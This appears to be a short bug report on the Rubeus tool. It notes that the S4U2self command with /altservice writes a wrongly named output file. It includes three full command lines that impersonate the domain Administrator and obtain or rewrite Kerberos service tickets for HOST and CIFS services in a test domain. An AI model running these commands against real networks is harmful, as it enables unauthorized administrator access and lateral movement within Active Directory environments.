i use S4U2self

Rubeus.exe s4u /ticket:1.kirbi /impersonateuser:Administrator /altservice:HOST/win-2008r2-2.missyou.com /domain:missyou.com /dc:dc.missyou.com /outfile:test.kirbi /nowrap /self

outfile

I use without adding the /altservice parameter, and the output file name is normal

Rubeus.exe s4u /ticket:1.kirbi /impersonateuser:Administrator /domain:missyou.com /dc:dc.missyou.com /outfile:test.kirbi /nowrap /self

but need to execute tgssub again

Rubeus.exe tgssub /altservice:cifs/win-2008.missyou.com /ticket:test2_Administrator_to_win-2008$@MISSYOU.COM.kirbi /nowrap

The two operations are equivalent, but there is a problem with the output filename output of s4u /altservice . Although it does not affect the use of the final Service Ticket, I think this is a point that can be optimized.